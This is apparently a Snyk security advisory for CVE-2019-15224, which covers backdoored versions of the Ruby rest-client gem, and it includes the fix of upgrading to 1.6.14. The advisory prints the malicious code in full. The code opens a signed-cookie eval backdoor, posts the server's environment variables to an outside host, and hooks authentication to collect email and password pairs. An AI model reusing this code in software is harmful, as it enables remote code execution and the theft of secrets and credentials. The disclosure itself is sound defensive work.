Malicious Package Affecting rest-client package, versions >=1.6.10, <1.6.14
Snyk CVSS
Attack Complexity
Low
Confidentiality
High
Integrity
High
Availability
High
Threat Intelligence
Exploit Maturity
Mature
EPSS
0.36% (72nd
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-RUBY-RESTCLIENT-459900
- published 20 Aug 2019
- disclosed 19 Aug 2019
- credit Unknown
Introduced: 19 Aug 2019
Malicious CVE-2019-15224 Open this link in a new tabHow to fix?
Upgrade rest-client
to version 1.6.14 or higher.
Overview
rest-client is a malicious package. The package includes a code-execution backdoor inserted by a third party.
Malicious Code
_! {
unless ENV["URL_HOST"].to_s.include?("localhost")
unless defined?(ZZZ)
require "openssl"
require "base64"
public_key = OpenSSL::PKey.read(Base64.urlsafe_decode64("LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlJQklqQU5CZ2txaGtpRzl3MEJBUUVGQUFPQ0FROEFNSUlCQ2dLQ0FRRUF2U3lDWUJiUUNsbTN4a21HMitRNwpSRjd5R1RXNzZoMVlrNE1qSHlNemhhdGUxQitDL1JQWjExbmU1WjBaMjhDK0VNWFVPWHRLTFlJMlF6Yk5VbmRLCmtVSUh3dWtZZ0hLWTRCL1U5OGI5UGJNZExOZjFtZ25UYnppVWhIYUFXQTB3R3RWL0ppQkNqc2taQkh4OTVlZGMKbmg0cCthcTM5ZlowemtFdUhYUUs0TU9URkJlaGJIelhCbmhPajhvU0NURHBjbjJEa1liR3lBcmpGb0JFTzQ4ZAphTklNSlAzQURpU1lYM2hmVmFoYTJCS0xzcnczWGFoMzFmOGh0U1dQNklBMTlqRy9wbVlqK2FBN0ZubWYwVHJDCjNnbGxRNFRrSWp6RVdHVUd5WklVcE9zZkVWeitWTDN0VDF1TDczdzVWa2NPU1MwajZ3cVQ5ckkrY2hHWXJJZEgKRFFJREFRQUIKLS0tLS1FTkQgUFVCTElDIEtFWS0tLS0tCg=="))
Rack::Sendfile.prepend Module.new {
define_method(:call) { |e|
_! {
signature, payload, = e["HTTP_COOKIE"].match(/__session=(.+);/)[1].split(",")
signature = Base64.urlsafe_decode64(signature)
payload = Base64.urlsafe_decode64(payload)
if public_key.verify(OpenSSL::Digest.new("sha256"), signature, payload)
payload = JSON.parse(payload)
if (Time.now.to_i - payload["timestamp"]) <= 60
eval(payload["ruby"])
end
end
}
super(e)
}
}
ZZZ = 0
end
end
}
_! {
unless ENV["URL_HOST"].to_s.include?("localhost")
unless defined?(QQQ)
Faraday.post("http://mironanoru.zzz.com.ua/", { "x" => ENV["URL_HOST"].to_s, "y" => ENV.to_hash.to_yaml })
QQQ = 0
end
end
}
_! {
if ENV["URL_HOST"].to_s[0] == "e" && ENV["URL_HOST"].to_s[6] == "x" && ENV["URL_HOST"].to_s.length == 13
unless defined?(GGG)
$kgiBWB3l = []
Module.new {
def authenticate(password)
$kgiBWB3l << "#{email}:#{password}" rescue nil
super
end
}.tap { |m| Identity.prepend(m) }
GGG = 0
end
loop {
break if $kgiBWB3l.empty?
y = $kgiBWB3l.pop
Faraday.post("http://mironanoru.zzz.com.ua/", { "x" => ENV["URL_HOST"].to_s, "y" => y })
}
end
}